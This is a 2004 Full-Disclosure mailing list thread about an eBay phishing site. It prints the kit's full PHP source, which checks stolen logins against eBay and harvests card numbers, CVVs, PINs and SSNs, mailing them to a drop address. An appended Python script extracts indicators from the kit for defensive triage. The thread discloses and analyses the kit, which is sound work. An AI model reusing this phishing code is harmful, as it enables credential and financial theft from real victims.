RE: [Full-Disclosure] phish

From: Andrew Poodle (andrewp_at_IRW.co.uk)
Date: 11/08/04

    To: "D B" <geggam692000@yahoo.com>, <full-disclosure@lists.netsys.com>
    Date: Mon, 8 Nov 2004 10:44:07 -0000
    
    

    Not a very good one..

    Submitting with an empty field displayed the raw PHP code..

    Seems to send to

    mail("ebaynix@yahoo.com","$userid","$userid $pass");

    Below..

    ----------------------8<-------------------------------
    <?php
        function query_str ($params) {
            $str = '';
            foreach ($params as $key => $value) {
                $str .= (strlen($str) < 1) ? '' : '&';
                $str .= $key . '=' . rawurlencode($value);
            }
            return ($str);
        }
    parse_str($HTTP_SERVER_VARS['QUERY_STRING']);
    if($MfcISAPICommand=="SignInFPP"){
      include 'login.php';
    }
    elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $userid=str_replace(" ","",$userid);
    $pass=str_replace(" ","",$pass);
    $fd = fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignInWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&userid=$userid&pass=$pass","r");
      while ($line=fgets($fd,1000))
      {
            if(strstr($line,"not valid"))
            $signerr=1;
            if(strstr($line,"Your User ID is not valid"))
            $signerr=2;
      }
    fclose ($fd);
    if($signerr)
            include 'login.php';
    else{
    mail("ebaynix@yahoo.com","$userid","$userid $pass");
    include 'step1.php';
    }
    }
    elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){
    include 'step2.php';
    }

    elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $firstname = rtrim($firstname);
    $lastname = rtrim($lastname);
    $street = rtrim($street);
    $city = rtrim($city);
    $zip = rtrim($zip);
    $dayphone12 = rtrim($dayphone12);
    $dayphone22 = rtrim($dayphone22);
    $dayphone32 = rtrim($dayphone32);
    $dayphone42 = rtrim($dayphone42);

    $error = 0;
    if (!strlen($firstname)){
            $error = 1;
            $firstnameerr = 1;
    }

    if (!strlen($lastname)){
            $error = 1;
            $lastnameerr = 1;
    }
    if (!strlen($street)){
            $error = 1;
            $streeterr = 1;
    }
    if (!strlen($city)){
            $error = 1;
            $cityerr = 1;
    }
    /*if ($state == "default"){
            $error = 1;
            $rstateerr = 1;
    }
    */
    if (!strlen($zip) && !is_numeric($zip)){
            $error = 1;
            $ziperr = 1;
    }
    if (!strlen($dayphone12)){
            $error = 1;
            $dayphone12err = 1;
    }
    if (!strlen($dayphone22)){
            $error = 1;
            $dayphone22err = 1;
    }
    if (!strlen($dayphone32)){
            $error = 1;
            $dayphone32err = 1;
    }
    if(strlen($ssn)<1){
    $error=1;
    $ssnerr=1;
    }

    if ($error == 1)
            include 'step2.php';
    else
        include 'step3.php';
    }

    elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $ccnumber = rtrim($ccnumber);
    $ccmonth = rtrim($ccmonth);
    $ccyear = rtrim($ccyear);
    $cvv = rtrim($cvv);
    $pin = rtrim($pin);

    $error = 0;
    $a = substr($ccnumber,0,1);

    if($a == "3"){
            if (strlen($cvv) != 4){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "4"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "5"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "6"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    else{
            $error = 1;
            $ccnumbererr = 1;}

    if(strlen($ccnumber)!=16){
    $error=1;
    $ccnumbererr=1;
    }
    //ccmonth si ccyear;

    if(!strcmp($pin,"1234")||!strcmp($pin,"0000")){
    $pinerr=1;
    $error=1;
    }

    if(strlen($pin)<4){
    $pinerr=1;
    $error=1;
    }

    if($error==1) include 'step3.php';
    else{
    $message="-------------------------------------------------------
    -=::: Login Info :::=-

    user: $userid
    pass: $pass
    e-mail: $email

    -=::: Credit Card Info :::=-

    Credit Card Number: $ccnumber
    Expiration Date: $ccmonth/$ccyear
    CVV2: $cvv
    PIN: $pin
    Full Name: $firstname $lastname
    Address: $street
    City: $city
    State: $state
    Zip: $zip
    Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42
    Country: $country
    SSN: $ssn
    ";
    mail("ebaynix@yahoo.com","Fullinfo: $ccnumber","$message");
    include 'process.htm';
    }

    }

    elseif ($MfcISAPICommand=="SuccessfullFPP")
            include 'success.htm';
    else
            include 'error.htm';
    ?>

    ----------------------------------------------------------------
    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of D B
    Sent: 08 November 2004 10:21
    To: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] phish

    another ebay phish

    http://www.ebay-verifications.biz/ws2/

    header

    X-Apparently-To: geggam692000@yahoo.com via
    216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800
    X-YahooFilteredBulk: 66.139.79.218
    X-Originating-IP: [66.139.79.218]
    Return-Path: <apache@www2.triasite.net>
    Received: from 66.139.79.218 (EHLO www2.triasite.net)
    (66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004
    14:17:22 -0800
    Received: (from apache@localhost) by www2.triasite.net
    (8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004
    16:24:42 -0600
    Date: Sun, 7 Nov 2004 16:24:42 -0600
    Message-Id:
    <200411072224.iA7MOgr24317@www2.triasite.net>
    To: geggam692000@yahoo.com
    Subject: eBay Database Critical Update Notification!
    From: "eBay" <accounts@ebay.com>
    Reply-to:
    MIME-Version: 1.0
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit
    Content-Length: 2058

                    
     

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

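One way to triage a leaked kit source like the handler quoted above, as an added example that is not part of the original post: it extracts the literal mail() recipients (the drop mailbox to report to the mail provider), the remote hosts the script contacts, and the pages it includes. The function names and the commented-out sample line are constructed for illustration; the other sample lines are taken from the quoted source with the URL shortened.

```python
import re
from urllib.parse import urlsplit

# Excerpt of the PHP quoted in the post (URL shortened). The line with
# commented@example.invalid is constructed to show that comments are ignored.
KIT_SOURCE = r'''
$fd = fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignInWelcome&userid=$userid&pass=$pass","r");
if($signerr)
        include 'login.php';
else{
mail("ebaynix@yahoo.com","$userid","$userid $pass");
include 'step1.php';
}
// mail("commented@example.invalid","x","y");
mail("ebaynix@yahoo.com","Fullinfo: $ccnumber","$message");
include 'process.htm';
'''

# /* ... */ blocks and // line comments; the lookbehind keeps "http://" intact.
COMMENT = re.compile(r'/\*.*?\*/|(?<!:)//[^\n]*', re.S)
# First argument of mail() when it is a quoted literal (variables are not resolved).
MAIL_CALL = re.compile(r'''\bmail\s*\(\s*(["'])(.*?)\1''')
URL = re.compile(r'''https?://[^\s"'<>]+''')
INCLUDE = re.compile(r'''\b(?:include|require)(?:_once)?\s*\(?\s*(["'])(.*?)\1''')


def strip_comments(src):
    """Remove PHP comments so disabled code does not produce indicators."""
    return COMMENT.sub("", src)


def triage(src):
    """Return drop addresses (with call counts), remote hosts and included pages."""
    code = strip_comments(src)
    drops = {}
    for match in MAIL_CALL.finditer(code):
        # mail() accepts a comma-separated recipient list in its first argument.
        for addr in match.group(2).split(","):
            addr = addr.strip()
            if addr:
                drops[addr] = drops.get(addr, 0) + 1
    hosts = sorted({h for h in (urlsplit(u).hostname for u in URL.findall(code)) if h})
    pages = sorted({m.group(2) for m in INCLUDE.finditer(code)})
    return {"drop_addresses": drops, "remote_hosts": hosts, "included_pages": pages}


if __name__ == "__main__":
    for key, value in triage(KIT_SOURCE).items():
        print(f"{key}: {value}")
```

Recipients built from variables or decoded at run time are not resolved by this static pass and need manual review.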

